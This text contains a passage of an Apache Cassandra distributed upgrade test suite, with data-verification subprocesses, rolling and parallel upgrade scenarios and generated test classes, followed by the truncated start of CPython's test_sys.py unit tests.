prepared.consistency_level = ConsistencyLevel.QUORUM
def handle_sigterm(signum, frame):
# need to close queue gracefully if possible, or the data_checker process
# can't seem to empty the queue and test failures result.
verification_done_queue.close()
exit(0)
signal.signal(signal.SIGTERM, handle_sigterm)
while True:
try:
# here we could block, but if the writer process terminates early with an empty queue
# we would end up blocking indefinitely
(key, expected_val) = to_verify_queue.get_nowait()
actual_val = session.execute(prepared, (key,))[0][0]
except Empty:
time.sleep(0.1) # let's not eat CPU if the queue is empty
continue
except Exception:
logger.debug("Error in data verifier process!")
verification_done_queue.close()
raise
else:
try:
verification_done_queue.put_nowait(key)
except Full:
# the rewritable queue is full, not a big deal. drop this one.
# we keep the rewritable queue held to a modest max size
# and allow dropping some rewritables because we don't want to
# rewrite rows in the same sequence as originally written
pass
assert expected_val == actual_val, "Data did not match expected value!"
def counter_incrementer(tester, to_verify_queue, verification_done_queue, rewrite_probability=0):
"""
Process for incrementing counters continuously.
Pushes to a queue to be consumed by counter_checker.
    Pulls from a queue of already-verified rows (verified by counter_checker) that it can increment again.
Intended to be run using multiprocessing.
"""
# 'tester' is a cloned object so we shouldn't be inappropriately sharing anything with another process
session = tester.patient_cql_connection(tester.node1, keyspace="upgrade", protocol_version=tester.protocol_version)
prepared = session.prepare("UPDATE countertable SET c = c + 1 WHERE k1=?")
prepared.consistency_level = ConsistencyLevel.QUORUM
def handle_sigterm(signum, frame):
# need to close queue gracefully if possible, or the data_checker process
# can't seem to empty the queue and test failures result.
to_verify_queue.close()
exit(0)
signal.signal(signal.SIGTERM, handle_sigterm)
while True:
try:
key = None
count = 0 # this will get set to actual last known count if we do a re-write
if (rewrite_probability > 0) and (random.randint(0, 100) <= rewrite_probability):
try:
key, count = verification_done_queue.get_nowait()
except Empty:
# we wanted a re-write but the re-writable queue was empty. oh well.
pass
key = key or uuid.uuid4()
            session.execute(prepared, (key,))
to_verify_queue.put_nowait((key, count + 1,))
except Exception:
logger.debug("Error in counter incrementer process!")
to_verify_queue.close()
raise
def counter_checker(tester, to_verify_queue, verification_done_queue):
"""
Process for checking counters continuously.
Pulls from a queue written to by counter_incrementer to know what to verify.
Pushes to a queue to tell counter_incrementer what's been verified and could be a candidate for incrementing again.
Intended to be run using multiprocessing.
"""
# 'tester' is a cloned object so we shouldn't be inappropriately sharing anything with another process
session = tester.patient_cql_connection(tester.node1, keyspace="upgrade", protocol_version=tester.protocol_version)
prepared = session.prepare("SELECT c FROM countertable WHERE k1=?")
prepared.consistency_level = ConsistencyLevel.QUORUM
def handle_sigterm(signum, frame):
# need to close queue gracefully if possible, or the data_checker process
# can't seem to empty the queue and test failures result.
verification_done_queue.close()
exit(0)
signal.signal(signal.SIGTERM, handle_sigterm)
while True:
try:
# here we could block, but if the writer process terminates early with an empty queue
# we would end up blocking indefinitely
(key, expected_count) = to_verify_queue.get_nowait()
actual_count = session.execute(prepared, (key,))[0][0]
except Empty:
time.sleep(0.1) # let's not eat CPU if the queue is empty
continue
except Exception:
logger.debug("Error in counter verifier process!")
verification_done_queue.close()
raise
else:
            assert expected_count == actual_count, "Data did not match expected value!"
try:
verification_done_queue.put_nowait((key, actual_count))
except Full:
# the rewritable queue is full, not a big deal. drop this one.
# we keep the rewritable queue held to a modest max size
# and allow dropping some rewritables because we don't want to
# rewrite rows in the same sequence as originally written
pass
@pytest.mark.upgrade_test
@pytest.mark.resource_intensive
@pytest.mark.skip("Fake skip so that this isn't run outside of a generated class that removes this annotation")
class TestUpgrade(Tester):
"""
Upgrades a 3-node Murmur3Partitioner cluster through versions specified in test_version_metas.
"""
test_version_metas = None # set on init to know which versions to use
subprocs = None # holds any subprocesses, for status checking and cleanup
extra_config = None # holds a non-mutable structure that can be cast as dict()
@pytest.fixture(autouse=True)
def fixture_add_additional_log_patterns(self, fixture_dtest_setup):
fixture_dtest_setup.ignore_log_patterns = (
# This one occurs if we do a non-rolling upgrade, the node
# it's trying to send the migration to hasn't started yet,
# and when it does, it gets replayed and everything is fine.
r'Can\'t send migration request: node.*is down',
r'RejectedExecutionException.*ThreadPoolExecutor has shut down',
# Occurs due to test/ccm writing topo on down nodes
r'Cannot update data center or rack from.*for live host',
            # Normal occurrence. See CASSANDRA-12026. Likely won't be needed after C* 4.0.
r'Unknown column cdc during deserialization',
)
def prepare(self):
logger.debug("Upgrade test beginning, setting CASSANDRA_VERSION to {}, and jdk to {}. (Prior values will be restored after test)."
.format(self.test_version_metas[0].version, self.test_version_metas[0].java_version))
cluster = self.cluster
cluster.set_install_dir(version=self.test_version_metas[0].version)
switch_jdks(self.test_version_metas[0].java_version)
self.fixture_dtest_setup.reinitialize_cluster_for_different_version()
logger.debug("Versions to test (%s): %s" % (type(self), str([v.version for v in self.test_version_metas])))
def init_config(self):
Tester.init_config(self)
if self.extra_config is not None:
logger.debug("Setting extra configuration options:\n{}".format(
pprint.pformat(dict(self.extra_config), indent=4))
)
self.cluster.set_configuration_options(
values=dict(self.extra_config)
)
def test_parallel_upgrade(self):
"""
Test upgrading cluster all at once (requires cluster downtime).
"""
self.upgrade_scenario()
@pytest.mark.timeout(3000)
def test_rolling_upgrade(self):
"""
Test rolling upgrade of the cluster, so we have mixed versions part way through.
"""
self.upgrade_scenario(rolling=True)
def test_parallel_upgrade_with_internode_ssl(self):
"""
Test upgrading cluster all at once (requires cluster downtime), with internode ssl.
"""
self.upgrade_scenario(internode_ssl=True)
@pytest.mark.timeout(3000)
def test_rolling_upgrade_with_internode_ssl(self):
"""
Rolling upgrade test using internode ssl.
"""
self.upgrade_scenario(rolling=True, internode_ssl=True)
def upgrade_scenario(self, populate=True, create_schema=True, rolling=False, after_upgrade_call=(), internode_ssl=False):
# Record the rows we write as we go:
if populate:
self.prepare()
self.row_values = set()
cluster = self.cluster
if cluster.version() >= '3.0':
cluster.set_configuration_options({'enable_user_defined_functions': 'true',
'enable_scripted_user_defined_functions': 'true'})
elif cluster.version() >= '2.2':
cluster.set_configuration_options({'enable_user_defined_functions': 'true'})
if internode_ssl:
logger.debug("***using internode ssl***")
generate_ssl_stores(self.fixture_dtest_setup.test_path)
self.cluster.enable_internode_ssl(self.fixture_dtest_setup.test_path)
if populate:
# Start with 3 node cluster
logger.debug('Creating cluster (%s)' % self.test_version_metas[0].version)
cluster.populate(3)
[node.start(use_jna=True, wait_for_binary_proto=True) for node in cluster.nodelist()]
else:
logger.debug("Skipping cluster creation (should already be built)")
# add nodes to self for convenience
for i, node in enumerate(cluster.nodelist(), 1):
node_name = 'node' + str(i)
setattr(self, node_name, node)
if create_schema:
if rolling:
self._create_schema_for_rolling()
else:
self._create_schema()
else:
logger.debug("Skipping schema creation (should already be built)")
time.sleep(5) # sigh...
self._log_current_ver(self.test_version_metas[0])
if rolling:
# start up processes to write and verify data
write_proc, verify_proc, verification_queue = self._start_continuous_write_and_verify(wait_for_rowcount=5000)
# upgrade through versions
for version_meta in self.test_version_metas[1:]:
if version_meta.family > '3.11' and internode_ssl:
                    seeds = []
for seed in cluster.seeds:
seeds.append(seed.ip_addr + ':7001')
logger.debug("Forcing seeds to 7001 for internode ssl")
cluster.seeds = seeds
for num, node in enumerate(self.cluster.nodelist()):
# sleep (sigh) because driver needs extra time to keep up with topo and make quorum possible
# this is ok, because a real world upgrade would proceed much slower than this programmatic one
# additionally this should provide more time for timeouts and other issues to crop up as well, which we could
# possibly "speed past" in an overly fast upgrade test
time.sleep(60)
self.upgrade_to_version(version_meta, partial=True, nodes=(node,), internode_ssl=internode_ssl)
self._check_on_subprocs(self.fixture_dtest_setup.subprocs)
logger.debug('Successfully upgraded %d of %d nodes to %s' %
(num + 1, len(self.cluster.nodelist()), version_meta.version))
self.cluster.set_install_dir(version=version_meta.version)
self.fixture_dtest_setup.reinitialize_cluster_for_different_version()
# Stop write processes
write_proc.terminate()
            # wait for the verification queue to empty (and check all rows) before continuing
self._wait_until_queue_condition('writes pending verification', verification_queue, operator.le, 0, max_wait_s=1200)
self._check_on_subprocs([verify_proc]) # make sure the verification processes are running still
self._terminate_subprocs()
# not a rolling upgrade, do everything in parallel:
else:
# upgrade through versions
for version_meta in self.test_version_metas[1:]:
self._write_values()
self._increment_counters()
self.upgrade_to_version(version_meta, internode_ssl=internode_ssl)
self.cluster.set_install_dir(version=version_meta.version)
self.fixture_dtest_setup.reinitialize_cluster_for_different_version()
self._check_values()
self._check_counters()
self._check_select_count()
# run custom post-upgrade callables
for call in after_upgrade_call:
call()
logger.debug('All nodes successfully upgraded to %s' % version_meta.version)
self._log_current_ver(version_meta)
cluster.stop()
def tearDown(self):
# just to be super sure we get cleaned up
self._terminate_subprocs()
super(TestUpgrade, self).tearDown()
def _check_on_subprocs(self, subprocs):
"""
Check on given subprocesses.
If any are not alive, we'll go ahead and terminate any remaining alive subprocesses since this test is going to fail.
"""
subproc_statuses = [s.is_alive() for s in subprocs]
if not all(subproc_statuses):
message = "A subprocess has terminated early. Subprocess statuses: "
for s in subprocs:
message += "{name} (is_alive: {aliveness}), ".format(name=s.name, aliveness=s.is_alive())
message += "attempting to terminate remaining subprocesses now."
self._terminate_subprocs()
raise RuntimeError(message)
def _terminate_subprocs(self):
for s in self.fixture_dtest_setup.subprocs:
if s.is_alive():
try:
psutil.Process(s.pid).kill() # with fire damnit
except Exception:
logger.debug("Error terminating subprocess. There could be a lingering process.")
pass
def upgrade_to_version(self, version_meta, partial=False, nodes=None, internode_ssl=False):
"""
Upgrade Nodes - if *partial* is True, only upgrade those nodes
that are specified by *nodes*, otherwise ignore *nodes* specified
and upgrade all nodes.
"""
logger.debug('Upgrading {nodes} to {version}'.format(nodes=[n.name for n in nodes] if nodes is not None else 'all nodes', version=version_meta.version))
switch_jdks(version_meta.java_version)
logger.debug("JAVA_HOME: " + os.environ.get('JAVA_HOME'))
if not partial:
nodes = self.cluster.nodelist()
for node in nodes:
logger.debug('Shutting down node: ' + node.name)
node.drain()
node.watch_log_for("DRAINED")
node.stop(wait_other_notice=False)
for node in nodes:
node.set_install_dir(version=version_meta.version)
logger.debug("Set new cassandra dir for %s: %s" % (node.name, node.get_install_dir()))
if internode_ssl and (version_meta.family == 'trunk' or version_meta.family >= '4.0'):
node.set_configuration_options({'server_encryption_options': {'enabled': True, 'enable_legacy_ssl_storage_port': True}})
# hacky? yes. We could probably extend ccm to allow this publicly.
# the topology file needs to be written before any nodes are started
# otherwise they won't be grouped into dc's properly for multi-dc tests
self.cluster._Cluster__update_topology_files()
# Restart nodes on new version
for node in nodes:
logger.debug('Starting %s on new version (%s)' % (node.name, version_meta.version))
# Setup log4j / logback again (necessary moving from 2.0 -> 2.1):
node.set_log_level("INFO")
node.start(wait_other_notice=400, wait_for_binary_proto=True)
node.nodetool('upgradesstables -a')
def _log_current_ver(self, current_version_meta):
"""
Logs where we currently are in the upgrade path, surrounding the current branch/tag, like ***sometag***
"""
vers = [m.version for m in self.test_version_metas]
curr_index = vers.index(current_version_meta.version)
logger.debug(
"Current upgrade path: {}".format(
vers[:curr_index] + ['***' + current_version_meta.version + '***'] + vers[curr_index + 1:]))
def _create_schema_for_rolling(self):
"""
Slightly different schema variant for testing rolling upgrades with quorum reads/writes.
"""
session = self.patient_cql_connection(self.node2, protocol_version=self.protocol_version)
session.execute("CREATE KEYSPACE upgrade WITH replication = {'class':'SimpleStrategy', 'replication_factor':3};")
session.execute('use upgrade')
session.execute('CREATE TABLE cf ( k uuid PRIMARY KEY, v uuid )')
session.execute('CREATE INDEX vals ON cf (v)')
session.execute("""
CREATE TABLE countertable (
k1 uuid,
c counter,
PRIMARY KEY (k1)
);""")
def _create_schema(self):
session = self.patient_cql_connection(self.node2, protocol_version=self.protocol_version)
session.execute("CREATE KEYSPACE upgrade WITH replication = {'class':'SimpleStrategy', 'replication_factor':2};")
session.execute('use upgrade')
session.execute('CREATE TABLE cf ( k int PRIMARY KEY, v text )')
session.execute('CREATE INDEX vals ON cf (v)')
session.execute("""
CREATE TABLE countertable (
k1 text,
k2 int,
c counter,
PRIMARY KEY (k1, k2)
);""")
def _write_values(self, num=100):
session = self.patient_cql_connection(self.node2, protocol_version=self.protocol_version)
session.execute("use upgrade")
for i in range(num):
x = len(self.row_values) + 1
session.execute("UPDATE cf SET v='%d' WHERE k=%d" % (x, x))
self.row_values.add(x)
def _check_values(self, consistency_level=ConsistencyLevel.ALL):
for node in self.cluster.nodelist():
session = self.patient_cql_connection(node, protocol_version=self.protocol_version)
session.execute("use upgrade")
for x in self.row_values:
query = SimpleStatement("SELECT k,v FROM cf WHERE k=%d" % x, consistency_level=consistency_level)
result = session.execute(query)
k, v = result[0]
assert x == k
assert str(x) == v
def _wait_until_queue_condition(self, label, queue, opfunc, required_len, max_wait_s=600):
"""
Waits up to max_wait_s for queue size to return True when evaluated against a condition function from the operator module.
Label is just a string identifier for easier debugging.
        On Mac OS X the queue size may not be checkable, in which case this method will not block.
If time runs out, raises RuntimeError.
"""
wait_end_time = time.time() + max_wait_s
while time.time() < wait_end_time:
try:
qsize = queue.qsize()
except NotImplementedError:
logger.debug("Queue size may not be checkable on Mac OS X. Test will continue without waiting.")
break
if opfunc(qsize, required_len):
logger.debug("{} queue size ({}) is '{}' to {}. Continuing.".format(label, qsize, opfunc.__name__, required_len))
break
if divmod(round(time.time()), 30)[1] == 0:
logger.debug("{} queue size is at {}, target is to reach '{}' {}".format(label, qsize, opfunc.__name__, required_len))
time.sleep(0.1)
continue
else:
raise RuntimeError("Ran out of time waiting for queue size ({}) to be '{}' to {}. Aborting.".format(qsize, opfunc.__name__, required_len))
def _start_continuous_write_and_verify(self, wait_for_rowcount=0, max_wait_s=600):
"""
Starts a writer process, a verifier process, a queue to track writes,
and a queue to track successful verifications (which are rewrite candidates).
wait_for_rowcount provides a number of rows to write before unblocking and continuing.
Returns the writer process, verifier process, and the to_verify_queue.
"""
# queue of writes to be verified
to_verify_queue = Queue(10000)
# queue of verified writes, which are update candidates
verification_done_queue = Queue(maxsize=500)
writer = Process(target=data_writer, args=(self, to_verify_queue, verification_done_queue, 25))
# daemon subprocesses are killed automagically when the parent process exits
writer.daemon = True
self.fixture_dtest_setup.subprocs.append(writer)
writer.start()
if wait_for_rowcount > 0:
self._wait_until_queue_condition('rows written (but not verified)', to_verify_queue, operator.ge, wait_for_rowcount, max_wait_s=max_wait_s)
verifier = Process(target=data_checker, args=(self, to_verify_queue, verification_done_queue))
# daemon subprocesses are killed automagically when the parent process exits
verifier.daemon = True
self.fixture_dtest_setup.subprocs.append(verifier)
verifier.start()
return writer, verifier, to_verify_queue
def _start_continuous_counter_increment_and_verify(self, wait_for_rowcount=0, max_wait_s=600):
"""
Starts a counter incrementer process, a verifier process, a queue to track writes,
and a queue to track successful verifications (which are re-increment candidates).
Returns the writer process, verifier process, and the to_verify_queue.
"""
# queue of writes to be verified
to_verify_queue = Queue()
# queue of verified writes, which are update candidates
verification_done_queue = Queue(maxsize=500)
        incrementer = Process(target=counter_incrementer, args=(self, to_verify_queue, verification_done_queue, 25))
# daemon subprocesses are killed automagically when the parent process exits
incrementer.daemon = True
self.fixture_dtest_setup.subprocs.append(incrementer)
incrementer.start()
if wait_for_rowcount > 0:
self._wait_until_queue_condition('counters incremented (but not verified)', to_verify_queue, operator.ge, wait_for_rowcount, max_wait_s=max_wait_s)
        count_verifier = Process(target=counter_checker, args=(self, to_verify_queue, verification_done_queue))
# daemon subprocesses are killed automagically when the parent process exits
count_verifier.daemon = True
self.fixture_dtest_setup.subprocs.append(count_verifier)
count_verifier.start()
return incrementer, count_verifier, to_verify_queue
def _increment_counters(self, opcount=25000):
logger.debug("performing {opcount} counter increments".format(opcount=opcount))
session = self.patient_cql_connection(self.node2, protocol_version=self.protocol_version)
session.execute("use upgrade;")
update_counter_query = ("UPDATE countertable SET c = c + 1 WHERE k1='{key1}' and k2={key2}")
self.expected_counts = {}
for i in range(10):
self.expected_counts[uuid.uuid4()] = defaultdict(int)
fail_count = 0
for i in range(opcount):
key1 = random.choice(list(self.expected_counts.keys()))
key2 = random.randint(1, 10)
try:
query = SimpleStatement(update_counter_query.format(key1=key1, key2=key2), consistency_level=ConsistencyLevel.ALL)
session.execute(query)
except WriteTimeout:
fail_count += 1
else:
self.expected_counts[key1][key2] += 1
if fail_count > 100:
break
assert fail_count < 100, "Too many counter increment failures"
def _check_counters(self):
logger.debug("Checking counter values...")
session = self.patient_cql_connection(self.node2, protocol_version=self.protocol_version)
session.execute("use upgrade;")
for key1 in list(self.expected_counts.keys()):
for key2 in list(self.expected_counts[key1].keys()):
expected_value = self.expected_counts[key1][key2]
query = SimpleStatement("SELECT c from countertable where k1='{key1}' and k2={key2};".format(key1=key1, key2=key2),
consistency_level=ConsistencyLevel.ONE)
results = session.execute(query)
if results is not None:
actual_value = results[0][0]
else:
# counter wasn't found
actual_value = None
assert actual_value == expected_value
def _check_select_count(self, consistency_level=ConsistencyLevel.ALL):
logger.debug("Checking SELECT COUNT(*)")
session = self.patient_cql_connection(self.node2, protocol_version=self.protocol_version)
session.execute("use upgrade;")
expected_num_rows = len(self.row_values)
countquery = SimpleStatement("SELECT COUNT(*) FROM cf;", consistency_level=consistency_level)
result = session.execute(countquery)
if result is not None:
actual_num_rows = result[0][0]
assert actual_num_rows == expected_num_rows, "SELECT COUNT(*) returned %s when expecting %s" % (actual_num_rows, expected_num_rows)
else:
self.fail("Count query did not return")
class BootstrapMixin(object):
"""
Can be mixed into UpgradeTester or a subclass thereof to add bootstrap tests.
Using this class is not currently feasible on lengthy upgrade paths, as each
version bump adds a node and this will eventually exhaust resources.
"""
def _bootstrap_new_node(self):
# Check we can bootstrap a new node on the upgraded cluster:
logger.debug("Adding a node to the cluster")
nnode = new_node(self.cluster, remote_debug_port=str(2000 + len(self.cluster.nodes)))
nnode.start(use_jna=True, wait_other_notice=240, wait_for_binary_proto=True)
self._write_values()
self._increment_counters()
self._check_values()
self._check_counters()
def _bootstrap_new_node_multidc(self):
# Check we can bootstrap a new node on the upgraded cluster:
logger.debug("Adding a node to the cluster")
nnode = new_node(self.cluster, remote_debug_port=str(2000 + len(self.cluster.nodes)), data_center='dc2')
nnode.start(use_jna=True, wait_other_notice=240, wait_for_binary_proto=True)
self._write_values()
self._increment_counters()
self._check_values()
self._check_counters()
def test_bootstrap(self):
# try and add a new node
self.upgrade_scenario(after_upgrade_call=(self._bootstrap_new_node,))
def test_bootstrap_multidc(self):
# try and add a new node
# multi dc, 2 nodes in each dc
self.prepare()
cluster = self.cluster
if cluster.version() >= '3.0':
cluster.set_configuration_options({'enable_user_defined_functions': 'true',
'enable_scripted_user_defined_functions': 'true'})
elif cluster.version() >= '2.2':
cluster.set_configuration_options({'enable_user_defined_functions': 'true'})
cluster.populate([2, 2])
[node.start(use_jna=True, wait_for_binary_proto=True) for node in self.cluster.nodelist()]
self._multidc_schema_create()
self.upgrade_scenario(populate=False, create_schema=False, after_upgrade_call=(self._bootstrap_new_node_multidc,))
def _multidc_schema_create(self):
session = self.patient_cql_connection(self.cluster.nodelist()[0], protocol_version=self.protocol_version)
if self.cluster.version() >= '1.2':
# DDL for C* 1.2+
session.execute("CREATE KEYSPACE upgrade WITH replication = {'class':'NetworkTopologyStrategy', 'dc1':1, 'dc2':2};")
else:
# DDL for C* 1.1
session.execute("""CREATE KEYSPACE upgrade WITH strategy_class = 'NetworkTopologyStrategy'
AND strategy_options:'dc1':1
AND strategy_options:'dc2':2;
""")
session.execute('use upgrade')
session.execute('CREATE TABLE cf ( k int PRIMARY KEY , v text )')
session.execute('CREATE INDEX vals ON cf (v)')
session.execute("""
CREATE TABLE countertable (
k1 text,
k2 int,
c counter,
PRIMARY KEY (k1, k2)
);""")
def create_upgrade_class(clsname, version_metas, protocol_version,
bootstrap_test=False, extra_config=None):
"""
Dynamically creates a test subclass for testing the given versions.
'clsname' is the name of the new class.
'protocol_version' is an int.
'bootstrap_test' is a boolean, if True bootstrap testing will be included. Default False.
    'version_metas' is a list of version metas (versions ccm will recognize), to be upgraded in order.
    'extra_config' is a tuple of config options that can (eventually) be cast as a dict,
    e.g. (('partitioner', 'org.apache.cassandra.dht.Murmur3Partitioner'),)
"""
if extra_config is None:
extra_config = (('partitioner', 'org.apache.cassandra.dht.Murmur3Partitioner'),)
if bootstrap_test:
parent_classes = (TestUpgrade, BootstrapMixin)
else:
parent_classes = (TestUpgrade,)
# short names for debug output
parent_class_names = [cls.__name__ for cls in parent_classes]
print("Creating test class {} ".format(clsname))
print(" for C* versions:\n{} ".format(pprint.pformat(version_metas)))
print(" using protocol: v{}, and parent classes: {}".format(protocol_version, parent_class_names))
print(" to run these tests alone, use `nosetests {}.py:{}`".format(__name__, clsname))
upgrade_applies_to_env = RUN_STATIC_UPGRADE_MATRIX or version_metas[-1].matches_current_env_version_family
newcls = type(
clsname,
parent_classes,
{'test_version_metas': version_metas, '__test__': True, 'protocol_version': protocol_version, 'extra_config': extra_config}
)
# Remove the skip annotation in the superclass we just derived from, we will add it back if we actually intend
# to skip with a better message
newcls.pytestmark = [mark for mark in newcls.pytestmark if not mark.name == "skip"]
if not upgrade_applies_to_env:
newcls.pytestmark.append(pytest.mark.skip("test not applicable to env"))
if clsname in globals():
raise RuntimeError("Class by name already exists!")
globals()[clsname] = newcls
return newcls
MultiUpgrade = namedtuple('MultiUpgrade', ('name', 'version_metas', 'protocol_version', 'extra_config'))
MULTI_UPGRADES = (
# Proto v3 upgrades (v3 is supported on 2.1, 2.2, 3.0, 3.11)
MultiUpgrade(name='TestProtoV3Upgrade_AllVersions_EndsAt_3_11_X',
version_metas=[current_2_1_x, current_2_2_x, current_3_0_x, indev_3_11_x], protocol_version=3, extra_config=None),
MultiUpgrade(name='TestProtoV3Upgrade_AllVersions_RandomPartitioner_EndsAt_3_11_X_HEAD',
version_metas=[current_2_1_x, current_2_2_x, current_3_0_x, indev_3_11_x], protocol_version=3,
extra_config=(
('partitioner', 'org.apache.cassandra.dht.RandomPartitioner'),
)),
    # Proto v4 upgrades (v4 is supported on 2.2, 3.0, 3.11, trunk)
MultiUpgrade(name='TestProtoV4Upgrade_AllVersions_EndsAt_Trunk_HEAD',
version_metas=[current_2_2_x, current_3_0_x, current_3_11_x, indev_trunk], protocol_version=4, extra_config=None),
MultiUpgrade(name='TestProtoV4Upgrade_AllVersions_RandomPartitioner_EndsAt_Trunk_HEAD',
version_metas=[current_2_2_x, current_3_0_x, current_3_11_x, indev_trunk], protocol_version=4,
extra_config=(
('partitioner', 'org.apache.cassandra.dht.RandomPartitioner'),
)),
    # Beta protocol versions don't work with this test because the client does not opt in to beta protocols.
    # Fine for now; update once protocol v5 is released.
# Proto v5 upgrades (v5 is supported on 3.0, 3.11, trunk)
# MultiUpgrade(name='TestProtoV5Upgrade_AllVersions_EndsAt_Trunk_HEAD',
# version_metas=[current_3_0_x, current_3_x, indev_trunk], protocol_version=5, extra_config=None),
# MultiUpgrade(name='TestProtoV5Upgrade_AllVersions_RandomPartitioner_EndsAt_Trunk_HEAD',
# version_metas=[current_3_0_x, current_3_x, indev_trunk], protocol_version=5,
# extra_config=(
# ('partitioner', 'org.apache.cassandra.dht.RandomPartitioner'),
# )),
)
for upgrade in MULTI_UPGRADES:
# if any version_metas are None, this means they are versions not to be tested currently
if all(upgrade.version_metas):
metas = upgrade.version_metas
if not RUN_STATIC_UPGRADE_MATRIX:
if metas[-1].matches_current_env_version_family:
# looks like this test should actually run in the current env, so let's set the final version to match the env exactly
oldmeta = metas[-1]
newmeta = oldmeta.clone_with_local_env_version()
logger.debug("{} appears applicable to current env. Overriding final test version from {} to {}".format(upgrade.name, oldmeta.version, newmeta.version))
metas[-1] = newmeta
create_upgrade_class(upgrade.name, [m for m in metas], protocol_version=upgrade.protocol_version, extra_config=upgrade.extra_config)
for pair in build_upgrade_pairs():
create_upgrade_class(
'Test' + pair.name,
[pair.starting_meta, pair.upgrade_meta],
protocol_version=pair.starting_meta.max_proto_v,
bootstrap_test=True
)
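# For reference, the MULTI_UPGRADES loop above is roughly equivalent to one explicit call per entry,
# e.g. (sketch; the class only runs un-skipped when RUN_STATIC_UPGRADE_MATRIX is set or the env matches
# the final version in the path):
# create_upgrade_class(
#     'TestProtoV3Upgrade_AllVersions_EndsAt_3_11_X',
#     [current_2_1_x, current_2_2_x, current_3_0_x, indev_3_11_x],
#     protocol_version=3,
#     extra_config=None,
# )
# The generated class is registered in globals(), so the test runner collects it like a hand-written
# TestUpgrade subclass.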
|
test_sys.py
|
# -*- coding: iso-8859-1 -*-
import unittest, test.support
import sys, io, os
import struct
class SysModuleTest(unittest.TestCase):
def setUp(self):
self.orig_stdout = sys.stdout
self.orig_stderr = sys.stderr
self.orig_displayhook = sys.displayhook
def tearDown(self):
sys.stdout = self.orig_stdout
sys.stderr = self.orig_stderr
sys.displayhook = self.orig_displayhook
def test_original_displayhook(self):
import builtins
out = io.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(builtins, "_"):
del builtins._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assert_(not hasattr(builtins, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
def test_lost_displayhook(self):
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
def test_original_excepthook(self):
err = io.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError as exc:
eh(*sys.exc_info())
self.assert_(err.getvalue().endswith("ValueError: 42\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assert_("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exit(self):
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
try:
sys.exit(0)
except SystemExit as exc:
self.assertEquals(exc.code, 0)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
        # call with integer argument
try:
sys.exit(42)
except SystemExit as exc:
self.assertEquals(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
        # call with tuple argument with one entry
        # entry will be unpacked
try:
sys.exit((42,))
except SystemExit as exc:
self.assertEquals(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with string argument
try:
sys.exit("exit")
except SystemExit as exc:
self.assertEquals(exc.code, "exit")
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with two entries
try:
sys.exit((17, 23))
except SystemExit as exc:
self.assertEquals(exc.code, (17, 23))
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# test that the exit machinery handles SystemExits properly
import subprocess
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit(47)"])
self.assertEqual(rc, 47)
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assert_(isinstance(sys.getdefaultencoding(), str))
# testing sys.settrace() is done in test_trace.py
# testing sys.setprofile() is done in test_profile.py
def test_setcheckinterval(self):
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEquals(sys.getcheckinterval(), n)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
if hasattr(sys, "getwindowsversion"):
v = sys.getwindowsversion()
self.assert_(isinstance(v, tuple))
self.assertEqual(len(v), 5)
self.assert_(isinstance(v[0], int))
self.assert_(isinstance(v[1], int))
self.assert_(isinstance(v[2], int))
self.assert_(isinstance(v[3], int))
self.assert_(isinstance(v[4], str))
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
def test_dlopenflags(self):
if hasattr(sys, "setdlopenflags"):
self.assert_(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
def test_refcount(self):
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assert_(isinstance(sys.gettotalrefcount(), int))
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assert_(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
def test_current_frames(self):
have_threads = True
try:
import _thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
def current_frames_with_threads(self):
import threading, _thread
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(_thread.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
